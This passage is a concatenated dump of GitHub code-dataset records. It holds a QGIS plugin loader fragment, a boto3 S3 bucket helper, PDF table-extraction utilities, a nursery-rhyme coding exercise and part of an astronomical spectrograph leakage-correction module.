IMLAuthExtension.__init__(self, network, *a, **kw)\n\n def _retry_with_auth(self, reply):\n # retried params\n self.lst_added_feat.retry_params()\n self.removed_feat.retry_params()\n # try to reauth, then continue run loop\n self.con_auth.start(self.get_conn_info())\n","repo_name":"heremaps/xyz-qgis-plugin","sub_path":"XYZHubConnector/xyz_qgis/iml/loader/iml_layer_loader.py","file_name":"iml_layer_loader.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"73504587672","text":"import boto3\n\nclass s3_output_bucket:\n def __init__(self, bucket_name):\n self.bucket_name = bucket_name\n self.client = boto3.client(\"s3\")\n self.response = None\n \n def create_bucket(self):\n print(\"Creating output bucket...\")\n response = self.client.create_bucket(\n Bucket = self.bucket_name\n )\n return response\n \n def delete_bucket(self):\n print(\"Deleting S3 output bucket...\")\n self.clear_bucket()\n self.response = self.client.delete_bucket(\n Bucket = self.bucket_name\n )\n return self.response\n\n #Citation: learned how to clear s3 bucket with boto3 from Stack Overflow\n #Link: https://stackoverflow.com/questions/43326493/what-is-the-fastest-way-to-empty-s3-bucket-using-boto3/43328646\n def clear_bucket(self):\n s3 = boto3.resource(\"s3\")\n bucket = s3.Bucket(self.bucket_name)\n bucket.objects.all().delete()\n\n#Create Bucket for Debugging\nif __name__ == \"__main__\":\n import time\n newbucket = s3_output_bucket(\"talia-4452-f21-thien-output-bucket\")\n newbucket.create_bucket()\n time.sleep(10)\n newbucket.delete_bucket()","repo_name":"thienlongtran/sma-pipeline","sub_path":"infrastructure/s3_output.py","file_name":"s3_output.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26636921903","text":"import numpy as np\nimport dateparser\nimport camelot\nimport tabula\nimport pdfplumber\nimport pandas as pd\nimport math\nimport gc\n\nfrom pdfminer.high_level import extract_pages\nfrom camelot.core import TableList\nfrom utils.tabledetection.tabnet import ExtractTable\n\n\ndef clean_numbers_str(text):\n chars = ['%', '*']\n\n if type(text) != str or text is None:\n return text\n\n for ch in chars:\n text = text.replace(ch, '')\n \n return text.strip()\n\n\ndef are_keywords_in_table(df, keywords):\n\n found = []\n table = [df.columns.values.tolist()] + df.values.tolist()\n table = [x.lower().strip().replace(\"\\n\", \"\") for x in np.array(table).flatten()]\n\n for word in keywords:\n for text in table:\n if word in text:\n found.append(word)\n break\n \n return len(keywords) == len(found)\n\n\ndef find_table_by_keywords(tables, keywords):\n\n for table in tables:\n if isinstance(table, pd.DataFrame):\n table_df = table\n else:\n table_df = table.df\n\n if are_keywords_in_table(table_df, keywords):\n return table_df\n return None\n\n\ndef find_all_tables_by_keywords(tables, keywords):\n result = []\n for table in tables:\n table_df = table.df\n if are_keywords_in_table(table_df, keywords):\n result.append(table_df)\n return result\n\n\ndef convert_df_to_dict(df, key_idx, val_idx, remove_nan=True):\n keys = df.values[:, key_idx]\n vals = df.values[:, val_idx]\n\n if remove_nan:\n df_dict = dict()\n\n for k, v in zip(keys, vals):\n if type(k) == float and k != k:\n continue\n df_dict[k] = v\n else:\n df_dict = {k:v for (k, v) in zip(keys, vals)}\n\n return df_dict\n\ndef add_values_from_neighbors(df, df_dict, key_idx, val_idx):\n # idea is to check till when is the value empty and all hose indices\n # in value should go to the current index\n # for example consider key list [\"\", \"total number #\", \"\"]\n # and value list [\"\", \"\", \"12345\"]\n # it is happening in case of Tamil Nadu table on Page number 2\n # consider this to be a sort of a patch\n keys = df.values[:, key_idx]\n vals = df.values[:, val_idx]\n keys_list = keys.tolist()\n length = len(keys)\n\n for k, v in df_dict.items():\n # check if the dict doesnt have any value\n if k in df_dict and df_dict[k] == \"\":\n value = \"\"\n index = keys_list.index(k)\n # check previous neighbors\n counter = 1\n check_previous_neighbor = True\n if index - 1 > 0 and keys[index - 1] == \"\":\n # prepend the value\n value = vals[index - counter] + value\n\n # check next neighbors\n if index + 1 < length and keys[index + counter] == \"\":\n # append the value\n value += vals[index + counter]\n\n df_dict[k] = value\n\n return df_dict\n\n\ndef extract_info_from_table_by_keywords(df_dict, keymap):\n\n result = {}\n for text, val in df_dict.items():\n for id, keys in keymap.items():\n if False in [key in text.lower() for key in keys]:\n continue\n result[id] = val\n\n return result\n\n\ndef parse_dates(datestr):\n\n date = dateparser.parse(datestr)\n datestr = f'{date.year}-{date.month:02d}-{date.day:02d}'\n return datestr\n\n\ndef n_pages_in_pdf(pdf_fpath):\n pages = list(extract_pages(pdf_fpath))\n return len(pages)\n\n\ndef get_tables_from_pdf_camelot(pdf_fpath, pages=None, strip_text='\\n', split_text=True, use_stream=False):\n pagerange = \"1-end\" if pages is None else ','.join(map(str, pages))\n _flavor = \"stream\" if use_stream else \"lattice\"\n tables = camelot.read_pdf(pdf_fpath, pages=pagerange, flavor=_flavor, strip_text=strip_text, split_text=split_text)\n gc.collect()\n return tables\n\n\ndef get_tables_from_pdf_tabula(pdf_fpath, pages=None):\n pagerange = \"all\" if pages is None else pages\n tables = tabula.read_pdf(pdf_fpath, pages=pagerange)\n gc.collect()\n return tables\n\n\ndef get_tables_from_pdf_with_smart_boundary_detection(library, pdf_fpath, pages, kwargs):\n\n if library.lower().strip() == 'camelot':\n # Use CascadeTabNet model to identify table boundaries in the PDF\n # Use the detected boundaries to extract tables using Camelot library\n # for better extraction\n\n boundary_detection = ExtractTable(pdf_fpath, pagenums=pages, origin='bottom-left')\n tablesdict = boundary_detection.extract() # dictionary of page nums -> list of table boundaries\n result = []\n\n del boundary_detection\n gc.collect()\n\n camelot_splittext = kwargs.get('split_text', True)\n camelot_flavor = kwargs.get('flavor', 'lattice')\n\n camelot_kwargs = {\n 'split_text': camelot_splittext,\n 'flavor': camelot_flavor,\n 'strip_text': '\\n'\n }\n\n for pageno, table_bounds in tablesdict.items():\n bound_str = [','.join(map(str, bound)) for bound in table_bounds]\n\n if camelot_flavor == 'stream':\n camelot_kwargs['table_areas'] = bound_str\n elif camelot_flavor == 'lattice':\n camelot_kwargs['table_regions'] = bound_str\n\n pagetables = camelot.read_pdf(pdf_fpath, pages=f'{pageno+1}', **camelot_kwargs)\n result.extend(pagetables._tables)\n\n result = TableList(result)\n gc.collect()\n return result\n\n elif library.lower().strip() == 'tabula':\n\n boundary_detection = ExtractTable(pdf_fpath, pagenums=pages, origin='top-left')\n tablesdict = boundary_detection.extract()\n result = []\n\n del boundary_detection\n gc.collect()\n\n for pageno, table_bounds in tablesdict.items():\n\n tabula_bounds = [[y1, x1, y2, x2] for (x1, y1, x2, y2) in table_bounds]\n pagetables = tabula.read_pdf(\n pdf_fpath, pages=pageno+1, area=tabula_bounds\n )\n result.extend(pagetables)\n \n gc.collect()\n return result\n\n else:\n raise NotImplementedError('Smart boundary understanding with library other than Camelot not yet implemented')\n\n\ndef get_tables_from_pdf(library, pdf_fpath, pages=None, smart_boundary_detection=False, **kwargs):\n\n if smart_boundary_detection:\n return get_tables_from_pdf_with_smart_boundary_detection(\n library, pdf_fpath, pages, kwargs\n )\n else:\n if library.lower().strip() == 'camelot':\n return get_tables_from_pdf_camelot(pdf_fpath, pages, **kwargs)\n elif library.lower().strip() == 'tabula':\n return get_tables_from_pdf_tabula(pdf_fpath, pages)\n\n\ndef get_pageno_with_text(pdf_fpath, keywords, start_page=None, end_page=None):\n\n with pdfplumber.open(pdf_fpath) as pdf:\n for page in pdf.pages:\n\n pageno = page.page_number\n\n if start_page is not None and pageno < start_page:\n continue\n if end_page is not None and pageno > end_page:\n continue\n\n pagetext = page.extract_text().lower()\n keywords_found = [\n keyword.lower() in pagetext \n for keyword in keywords\n ]\n\n if False not in keywords_found: # all keywords found:\n return pageno\n\n return None\n","repo_name":"IBM/covid19-india-data","sub_path":"data_extractor/local_extractor/utils/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":7426,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"5"} +{"seq_id":"13840591996","text":"this = [\n \"house that Jack built.\",\n \"malt\",\n \"rat\",\n \"cat\",\n \"dog\",\n \"cow with the crumpled horn\",\n \"maiden all forlorn\",\n \"man all tattered and torn\",\n \"priest all shaven and shorn\",\n \"rooster that crowed in the morn\",\n \"farmer sowing his corn\",\n \"horse and the hound and the horn\"\n]\n\nthat = [\n\"belonged to\",\n\"kept\",\n\"woke\",\n\"married\",\n\"kissed\",\n\"milked\",\n\"tossed\",\n\"worried\",\n\"killed\",\n\"ate\",\n\"lay in\",\n]\n\ndef recite(start_verse, end_verse):\n result = []\n for i in range(start_verse - 1, end_verse):\n result.append(verse(i))\n return result\n\ndef verse(n):\n verse = f'This is the {this[n]}'\n for k in range(n, 0, -1): \n verse += f' that {that[-k]} the {this[k-1]}'\n return verse\n","repo_name":"AndrejTS/python-exercises","sub_path":"house/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39228064077","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nApero FP leakage functionality\n\nCreated on 2022-01-26\n\n@author: cook\n\"\"\"\nimport os\nimport warnings\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nfrom astropy import constants as cc\nfrom astropy import units as uu\nfrom astropy.table import Table\n\nfrom apero import lang\nfrom apero.base import base\nfrom apero.core import constants\nfrom apero.core import math as mp\nfrom apero.core.core import drs_database\nfrom apero.core.core import drs_log, drs_file\nfrom apero.core.utils import drs_recipe\nfrom apero.science.calib import gen_calib\nfrom apero.science.calib import wave\nfrom apero.science.extract import gen_ext\n\n# =============================================================================\n# Define variables\n# =============================================================================\n__NAME__ = 'science.calib.leak.py'\n__INSTRUMENT__ = 'None'\n__PACKAGE__ = base.__PACKAGE__\n__version__ = base.__version__\n__author__ = base.__author__\n__date__ = base.__date__\n__release__ = base.__release__\n# get param dict\nParamDict = constants.ParamDict\nDrsFitsFile = drs_file.DrsFitsFile\nDrsNpyFile = drs_file.DrsNpyFile\nDrsRecipe = drs_recipe.DrsRecipe\n# Get Logging function\nWLOG = drs_log.wlog\n# Get the text types\ntextentry = lang.textentry\n# alias pcheck\npcheck = constants.PCheck(wlog=WLOG)\n# define the calibration database class\nCalibrationDatabase = drs_database.CalibrationDatabase\n# -----------------------------------------------------------------------------\n# Speed of light\n# noinspection PyUnresolvedReferences\nspeed_of_light_ms = cc.c.to(uu.m / uu.s).value\n# noinspection PyUnresolvedReferences\nspeed_of_light_kms = cc.c.to(uu.km / uu.s).value\n# Get function string\ndisplay_func = drs_log.display_func\n\n\n# =============================================================================\n# Define leakage functions\n# =============================================================================\ndef correct_ref_dark_fp(params: ParamDict, extractdict: ParamDict,\n bckgrd_percentile: Optional[int] = None,\n norm_percentile: Optional[int] = None,\n wsmooth: Optional[int] = None,\n kersize: Optional[int] = None\n ) -> Tuple[Dict[str, DrsFitsFile], ParamDict]:\n \"\"\"\n Correction for the reference dark fp\n\n :param params: ParamDict, parameter dictionary of constants\n :param extractdict: ParamDict, the extraction parameter dictionary\n :param bckgrd_percentile: int or None, optional, the thermal background\n percentile, overrides\n params['LEAK_BCKGRD_PERCENTILE']\n :param norm_percentile: int or None, optional, the normalisation percentile\n overrides params['LEAK_NORM_PERCENTILE']\n :param wsmooth: int or None, optional, the e-width of the smoothing kernel,\n overrides params['LEAKREF_WSMOOTH']\n :param kersize: int or None, optional, the kernel size, overrides\n params['LEAKREF_KERSIZE']\n\n :return: tuple, 1. the output diction of corrected fits file classes\n (keys are for each fiber)\n 2. the leak correction parameter dictionary\n \"\"\"\n # set function name\n func_name = __NAME__ + '.correct_ref_dark_fp'\n # load parameters from params/kwargs\n bckgrd_percentile = pcheck(params, 'LEAK_BCKGRD_PERCENTILE', func=func_name,\n override=bckgrd_percentile)\n norm_percentile = pcheck(params, 'LEAK_NORM_PERCENTILE', func=func_name,\n override=norm_percentile)\n w_smooth = pcheck(params, 'LEAKREF_WSMOOTH', func=func_name,\n override=wsmooth)\n ker_size = pcheck(params, 'LEAKREF_KERSIZE', func=func_name,\n override=kersize)\n # define a gaussian kernel that goes from +/- ker_size * w_smooth\n xkernel = np.arange(-ker_size * w_smooth, ker_size * w_smooth)\n ykernel = np.exp(-0.5 * (xkernel / w_smooth) ** 2)\n\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # output storage (dictionary of corrected extracted files)\n outputs = dict()\n # ----------------------------------------------------------------------\n # Deal with loading the reference fiber image props\n # ----------------------------------------------------------------------\n # check for reference fiber in extract dict\n if ref_fiber not in extractdict:\n eargs = [ref_fiber, ', '.join(extractdict.keys()), func_name]\n WLOG(params, 'error', textentry('00-016-00024', args=eargs))\n # get the reference file\n reffile = extractdict[ref_fiber]\n # get dprtype\n dprtype = reffile.get_hkey('KW_DPRTYPE')\n # get dpr type for ref image\n refdpr = pconst.FIBER_DPR_POS(dprtype, ref_fiber)\n # check that refdpr is FP (must be an FP)\n if refdpr != 'FP':\n # log and raise error\n eargs = [ref_fiber, dprtype, func_name]\n WLOG(params, 'error', textentry('00-016-00025', args=eargs))\n\n # get the data for the reference image\n refimage = reffile.get_data(copy=True)\n # get reference image size\n nord, nbpix = refimage.shape\n # ----------------------------------------------------------------------\n # remove the pedestal from the reference image and work out the amplitude\n # of the leak from the reference fiber\n # ----------------------------------------------------------------------\n # storage\n ref_amps = np.zeros_like(refimage)\n # loop around the orders\n for order_num in range(nord):\n # remove the pedestal from the FP to avoid an offset from\n # thermal background\n background = mp.nanpercentile(refimage[order_num], bckgrd_percentile)\n refimage[order_num] = refimage[order_num] - background\n # get the amplitudes\n amplitude = mp.nanpercentile(refimage[order_num], norm_percentile)\n ref_amps[order_num] = amplitude\n # normalize the reference image by this amplitude\n refimage[order_num] = refimage[order_num] / amplitude\n\n # save corrected refimage into output storage\n reffile.data = refimage\n outputs[ref_fiber] = reffile\n\n # ----------------------------------------------------------------------\n # process the science fibers\n # ----------------------------------------------------------------------\n for sci_fiber in sci_fibers:\n # check that science fiber is in extraction dictionary\n if sci_fiber not in extractdict:\n eargs = [sci_fiber, ', '.join(extractdict.keys()), func_name]\n WLOG(params, 'error', textentry('00-016-00026', args=eargs))\n # get the science image\n scifile = extractdict[sci_fiber]\n # get the data for the reference image\n sciimage = scifile.get_data(copy=True)\n # get the science image size\n nord, nbpix = sciimage.shape\n # loop around orders\n for order_num in range(nord):\n # median filtering has to be an odd number\n medfac = 2 * (w_smooth // 2) + 1\n # calculate median filter\n tmpimage = mp.medfilt_1d(sciimage[order_num], medfac)\n # set NaN pixels to zero\n tmpimage[np.isnan(tmpimage)] = 0\n # find a proxy for the low-frequency in the science channel\n mask = np.ones_like(tmpimage)\n mask[tmpimage == 0] = 0\n # calculate low-frequency\n part1 = np.convolve(tmpimage, ykernel, mode='same')\n part2 = np.convolve(mask, ykernel, mode='same')\n with warnings.catch_warnings(record=True) as _:\n low_f = part1 / part2\n # remove the low-frequencies from science image\n sciimage[order_num] = sciimage[order_num] - low_f\n # normalize by the reference amplitudes\n sciimage[order_num] = sciimage[order_num] / ref_amps[order_num]\n # save corrected science image into output storage\n scifile.data = sciimage\n outputs[sci_fiber] = scifile\n # ----------------------------------------------------------------------\n # Make properties dictionary\n props = ParamDict()\n props['LEAK_BCKGRD_PERCENTILE'] = bckgrd_percentile\n props['LEAK_NORM_PERCENTILE'] = norm_percentile\n props['LEAKREF_WSMOOTH'] = w_smooth\n props['LEAKREF_KERSIZE'] = ker_size\n # set sources\n keys = ['LEAK_BCKGRD_PERCENTILE', 'LEAK_NORM_PERCENTILE',\n 'LEAKREF_WSMOOTH', 'LEAKREF_KERSIZE']\n props.set_sources(keys, func_name)\n # ----------------------------------------------------------------------\n # return output dictionary with corrected extracted files\n return outputs, props\n\n\ndef manage_leak_correction(params: ParamDict, recipe: DrsRecipe,\n eprops: ParamDict, infile: DrsFitsFile,\n fiber: str,\n ref_e2ds: Optional[np.ndarray] = None) -> ParamDict:\n \"\"\"\n Manage the leak correction\n\n :param params: ParamDict, parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe instance that called this function\n :param eprops: ParamDict, parameter dictionary of extraction data\n :param infile: DrsFitsFile, the input drs file instance (for header)\n :param ref_e2ds: np.ndarray, the reference fiber e2ds\n :param fiber: str, the fiber we are correcting (we only correct science\n fibers)\n\n :return: ParamDict, the updated extraction data parameter dictionary\n \"\"\"\n # set the function name\n func_name = __NAME__ + '.manage_leak_correction()'\n # get dprtype\n dprtype = infile.get_hkey('KW_DPRTYPE', dtype=str)\n # get the ut file header\n inheader = infile.header\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # get the type of data for each fiber\n ref_type = pconst.FIBER_DATA_TYPE(dprtype, ref_fiber)\n # get vectors from eprops\n uncorr_e2ds = np.array(eprops['E2DS'])\n e2ds = np.array(eprops['E2DS'])\n # ----------------------------------------------------------------------\n # set reason not corrected\n reason = ''\n # deal with quick look\n quicklook = params['EXT_QUICK_LOOK']\n # add to reason\n if quicklook:\n reason += 'QUICKLOOK=True '\n # deal with wanting to do leak correction\n cond1 = not params['INPUTS']['LEAKCORR']\n # add to reason\n if cond1:\n if params['CORRECT_LEAKAGE']:\n reason += '--leakcorr=False '\n else:\n reason += 'CORRECT_LEAKAGE=False '\n # deal with correct fiber\n cond2 = fiber not in sci_fibers\n # add to reason\n if cond2:\n reason += 'FIBER={0} '.format(fiber)\n # make sure reference fiber is an FP\n cond3 = ref_type not in params.listp('LEAKAGE_REF_TYPES', dtype=str)\n # add to reason\n if cond3:\n reason += 'REFTYPE={0} '.format(ref_type)\n # deal with no reference image\n cond4 = ref_e2ds is None\n if cond4:\n reason += 'REF_E2DS=None '\n # if any of these conditions are true do not correct for dark_fp\n if quicklook or cond1 or cond2 or cond3 or cond4:\n # add used parametersLEAK_CORRECTED\n eprops['LEAK_2D_EXTRACT_FILES_USED'] = 'No leak'\n eprops['LEAK_EXTRACT_FILE_USED'] = 'No leak'\n eprops['LEAK_BCKGRD_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_NORM_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_LOW_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_HIGH_PERCENTILE_USED'] = 'No leak'\n eprops['LEAK_BAD_RATIO_OFFSET_USED'] = 'No leak'\n eprops['LEAK_CORRECTED'] = False\n eprops['LEAKREF_FILE'] = 'No leak'\n eprops['LEAKREF_TIME'] = 'No leak'\n eprops['LEAKREF_REFFILE'] = 'No leak'\n eprops['LEAKREF_REFTIME'] = 'No leak'\n # set sources\n keys = ['LEAK_2D_EXTRACT_FILES_USED', 'LEAK_EXTRACT_FILE_USED',\n 'LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n 'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n 'LEAK_BAD_RATIO_OFFSET_USED', 'LEAKREF_FILE', 'LEAKREF_TIME',\n 'LEAKREF_REFFILE', 'LEAKREF_REFTIME']\n eprops.set_sources(keys, func_name)\n # add updated e2ds\n eprops['UNCORR_E2DS'] = uncorr_e2ds\n eprops['E2DS'] = e2ds\n eprops['LEAKCORR'] = np.full_like(e2ds.shape, np.nan)\n # print progress\n WLOG(params, 'info', textentry('40-016-00034', args=[reason]))\n # return update extraction properties\n return eprops\n # -------------------------------------------------------------------------\n # print progress\n WLOG(params, 'info', textentry('40-016-00033', args=[fiber, dprtype]))\n # correct for leak\n e2ds, leakcorr, props = correct_ext_dark_fp(params, e2ds, ref_e2ds,\n inheader, fiber,\n database=None)\n # add used parameters\n for key in props:\n eprops.set(key, props[key], source=props.sources[key])\n # add updated e2ds\n eprops['UNCORR_E2DS'] = uncorr_e2ds\n eprops['E2DS'] = e2ds\n eprops['LEAKCORR'] = leakcorr\n eprops['LEAK_CORRECTED'] = True\n\n # ------------------------------------------------------------------\n # Add debugs for all uncorrected file\n # ------------------------------------------------------------------\n save_uncorrected_ext_fp(params, recipe, infile, eprops, fiber)\n\n # return update extraction properties\n return eprops\n\n\ndef correct_ext_dark_fp(params: ParamDict, sciimage: np.ndarray,\n refimage: np.ndarray, header: drs_file.Header,\n fiber: str,\n database: Optional[CalibrationDatabase] = None,\n leak2dext: Optional[List[str]] = None,\n extfiletype: Optional[str] = None,\n bckgrd_percentile: Optional[float] = None,\n norm_percentile: Optional[float] = None,\n low_percentile: Optional[float] = None,\n high_percentile: Optional[float] = None,\n bad_ratio: Optional[float] = None\n ) -> Tuple[np.ndarray, np.ndarray, ParamDict]:\n \"\"\"\n Correct the extracted file using the dark fp leak reference file\n\n :param params: ParamDict, parameter dictionary of constants\n :param sciimage: numpy 2D array, the extracted image (science fiber)\n :param refimage: numpy 2D array, the extracted image (reference fiber)\n :param header: fits.Header, the input image header, used to get closest\n reference file\n :param fiber: str, the science fiber of the sciimage\n :param database: CalibrationDatabase instance or None, if None loads the\n calibration database instance, otherwise uses open one\n :param leak2dext: str, allowed extraction file format (overrides\n LEAK_2D_EXTRACT_FILES from parameters if defined)\n :param extfiletype: str, file to use for leak correction (e2ds or e2dsff)\n (overrides LEAK_EXTRACT_FILE from parameters if defined)\n :param bckgrd_percentile: float, the thermal background percentile for\n leak correction (overrides LEAK_BCKGRD_PERCENTILE\n from parameters if defined)\n :param norm_percentile: float, the normalisation percentile for leak\n correction (overrides LEAK_NORM_PERCENTILE from\n parameters if defined)\n :param low_percentile: float, lower bound percentile for leak correction\n (overrides LEAK_LOW_PERCENTILE from parameters if\n defined)\n :param high_percentile: float, upper bound percentile for leak correction\n (overrides LEAK_HIGH_PERCENTILE from parameters if\n defined)\n :param bad_ratio: float, limit on spruious FP ratio 1 +/- limit (overrides\n LEAK_BAD_RATIO_OFFSET from parameters if defined)\n\n :return: tuple, 1. the updated sciimage, 2. the ratios used in leak corr\n 3. leak correction parameter dictionary\n \"\"\"\n # set the function name\n func_name = __NAME__ + '.correct_ext_dark_fp()'\n # get properties from parameters\n leak2dext = pcheck(params, 'LEAK_2D_EXTRACT_FILES', func=func_name,\n override=leak2dext, mapf='list')\n extfiletype = pcheck(params, 'LEAK_EXTRACT_FILE', func=func_name,\n override=extfiletype)\n bckgrd_percentile = pcheck(params, 'LEAK_BCKGRD_PERCENTILE', func=func_name,\n override=bckgrd_percentile)\n norm_percentile = pcheck(params, 'LEAK_NORM_PERCENTILE', func=func_name,\n override=norm_percentile)\n low_percentile = pcheck(params, 'LEAK_LOW_PERCENTILE', func=func_name,\n override=low_percentile)\n high_percentile = pcheck(params, 'LEAK_HIGH_PERCENTILE', func=func_name,\n override=high_percentile)\n bad_ratio = pcheck(params, 'LEAK_BAD_RATIO_OFFSET', func=func_name,\n override=bad_ratio)\n # group bounding percentiles\n bpercents = [low_percentile, high_percentile]\n # get size of reference image\n nbo, nbpix = sciimage.shape\n # copy images\n refimage = np.array(refimage)\n sciimage = np.array(sciimage)\n # ----------------------------------------------------------------------\n # get this instruments science fibers and reference fiber\n pconst = constants.pload()\n # science fibers should be list of strings, reference fiber should be string\n sci_fibers, ref_fiber = pconst.FIBER_KINDS()\n # ----------------------------------------------------------------------\n # get ref leak reference for file\n lmout = get_leak_ref(params, header, ref_fiber, 'LEAKREF_E2DS',\n database=database)\n rleakfile, rleakref, rleaktime = lmout\n # get leak reference for fiber\n lmout = get_leak_ref(params, header, fiber, 'LEAKREF_E2DS',\n database=database)\n leakfile, leakref, leaktime = lmout\n # ----------------------------------------------------------------------\n # store the ratio of observe to reference\n ref_ratio_arr = np.zeros(nbo)\n dot_ratio_arr = np.zeros(nbo)\n approx_ratio_arr = np.zeros(nbo)\n # store the method used (either \"dot\" or \"approx\")\n method = []\n # loop around reference image orders and normalise by percentile\n for order_num in range(nbo):\n # get order values for reference\n global_ref_ord = rleakref[order_num]\n # remove the pedestal from the FP to avoid an offset from\n # thermal background\n background = mp.nanpercentile(refimage[order_num], bckgrd_percentile)\n refimage[order_num] = refimage[order_num] - background\n # only perform the measurement of the amplitude of the leakage signal\n # on the lower and upper percentiles. This allows for a small number\n # of hot/dark pixels along the order. Without this, we end up with\n # some spurious amplitude values in the frames\n with warnings.catch_warnings(record=True) as _:\n # get percentiles\n low, high = mp.nanpercentile(refimage[order_num], bpercents)\n lowm, highm = mp.nanpercentile(global_ref_ord, bpercents)\n # translate this into a mask\n mask = refimage[order_num] > low\n mask &= refimage[order_num] < high\n mask &= global_ref_ord > lowm\n mask &= global_ref_ord < highm\n # approximate ratio, we know that frames were normalized with their\n # \"norm_percentile\" percentile prior to median combining\n amplitude = mp.nanpercentile(refimage[order_num], norm_percentile)\n approx_ratio = 1 / amplitude\n # save to storage\n approx_ratio_arr[order_num] = float(approx_ratio)\n # much more accurate ratio from a dot product\n part1 = mp.nansum(global_ref_ord[mask] * refimage[order_num][mask])\n part2 = mp.nansum(refimage[order_num][mask] ** 2)\n ratio = part1 / part2\n # save to storage\n dot_ratio_arr[order_num] = float(ratio)\n # deal with spurious ref FP ratio\n cond1 = (ratio / approx_ratio) < (1 - bad_ratio)\n cond2 = (ratio / approx_ratio) > (1 + bad_ratio)\n # Ratio must be within (1-badratio) to (1+badratio) of the approximate\n # ratio -- otherwise ratio is bad\n if cond1 or cond2:\n # log warning that ref FP ratio is spurious\n wargs = [order_num, ratio, approx_ratio, ratio / approx_ratio,\n 1 - bad_ratio, 1 + bad_ratio]\n WLOG(params, 'warning', textentry('10-016-00024', args=wargs),\n sublevel=4)\n # set the ratio to the approx ratio\n ratio = float(approx_ratio)\n # set the ratio method\n method.append('approx')\n else:\n # set method\n method.append('dot')\n # save ratios to storage\n ref_ratio_arr[order_num] = float(ratio)\n # --------------------------------------------------------------\n # storage for the ratio of leakage\n ratio_leak = np.zeros(nbo)\n # loop around orders\n for order_num in range(nbo):\n # scale the leakage for that order to the observed amplitude\n scale = leakref[order_num] / ref_ratio_arr[order_num]\n # apply leakage scaling\n sciimage[order_num] = sciimage[order_num] - scale\n # calculate the ratio of the leakage\n rpart1 = mp.nanpercentile(sciimage[order_num], norm_percentile)\n rpart2 = mp.nanmedian(sciimage[order_num])\n ratio_leak[order_num] = rpart1 / rpart2\n\n # ----------------------------------------------------------------------\n # generate a properties dictionary\n props = ParamDict()\n # ----------------------------------------------------------------------\n # add used parameters\n props['LEAK_2D_EXTRACT_FILES_USED'] = leak2dext\n props['LEAK_EXTRACT_FILE_USED'] = extfiletype\n props['LEAK_BCKGRD_PERCENTILE_USED'] = bckgrd_percentile\n props['LEAK_NORM_PERCENTILE_USED'] = norm_percentile\n props['LEAK_LOW_PERCENTILE_USED'] = low_percentile\n props['LEAK_HIGH_PERCENTILE_USED'] = high_percentile\n props['LEAK_BAD_RATIO_OFFSET_USED'] = bad_ratio\n props['LEAKREF_FILE'] = leakfile\n props['LEAKREF_TIME'] = leaktime\n props['LEAKREF_REFFILE'] = rleakfile\n props['LEAKREF_REFTIME'] = rleaktime\n # set sources\n keys = ['LEAK_2D_EXTRACT_FILES_USED', 'LEAK_EXTRACT_FILE_USED',\n 'LEAK_BCKGRD_PERCENTILE_USED', 'LEAK_NORM_PERCENTILE_USED',\n 'LEAK_LOW_PERCENTILE_USED', 'LEAK_HIGH_PERCENTILE_USED',\n 'LEAK_BAD_RATIO_OFFSET_USED', 'LEAKREF_FILE', 'LEAKREF_TIME',\n 'LEAKREF_REFFILE', 'LEAKREF_REFTIME']\n props.set_sources(keys, func_name)\n # ----------------------------------------------------------------------\n # return properties\n return sciimage, ratio_leak, props\n\n\ndef get_leak_ref(params: ParamDict, header: drs_file.Header, fiber: str,\n kind: str, filename: Optional[str] = None,\n database: Optional[CalibrationDatabase] = None\n ) -> Tuple[str, np.ndarray, float]:\n \"\"\"\n Get the leak reference file from the calibration database\n\n :param params: ParamDict, parameter dictionary of constants\n :param header: fits Header, the header to get the time for the closest\n leak reference file\n :param fiber: str, the fiber to get the leak reference file for\n :param kind: str, the DrsInputFile name\n :param filename: str or None, if set this is the leak reference file used\n :param database: Calibration database instance or None, if None we reload\n the calibration database\n :return: tuple, 1. the leak ref filename, 2. the leak ref image,\n 3. the observation time of the leak reference file\n \"\"\"\n # get file definition1\n out_leak = drs_file.get_file_definition(params, kind, block_kind='red')\n # get key\n key = out_leak.get_dbkey()\n # ----------------------------------------------------------------------\n # load database\n if database is None:\n calibdbm = drs_database.CalibrationDatabase(params)\n calibdbm.load_db()\n else:\n calibdbm = database\n # ------------------------------------------------------------------------\n # load calib file\n ckwargs = dict(key=key, inheader=header, filename=filename, fiber=fiber,\n userinputkey='LEAKFILE', database=calibdbm)\n\n cfile = gen_calib.CalibFile()\n cfile.load_calib_file(params, **ckwargs)\n # get properties from calibration file\n leak = cfile.data\n leak_file = cfile.filename\n leak_time = cfile.mjdmid\n # ------------------------------------------------------------------------\n # log which fpref file we are using\n WLOG(params, '', textentry('40-016-00028', args=[leak_file]))\n # return the reference image\n return leak_file, leak, leak_time\n\n\ndef ref_dark_fp_cube(params: ParamDict, recipe: DrsRecipe,\n extractdict: Dict[str, List[DrsFitsFile]]\n ) -> Tuple[Dict[str, DrsFitsFile], Dict[str, Table]]:\n \"\"\"\n\n :param params: ParamDict, parameter dictionary of constants\n :param recipe: DrsRecipe, the recipe class that called this function\n :param extractdict: dictionary of lists of drs fits files - each list\n should have the fibers extraction DrsFitsFile files\n each key should be a fiber\n :return: tuple, 1. dictionary the dark fp cube for each fiber (key),\n 2. the combine table for each dark fp cube for each fiber (key)\n \"\"\"\n # median cube 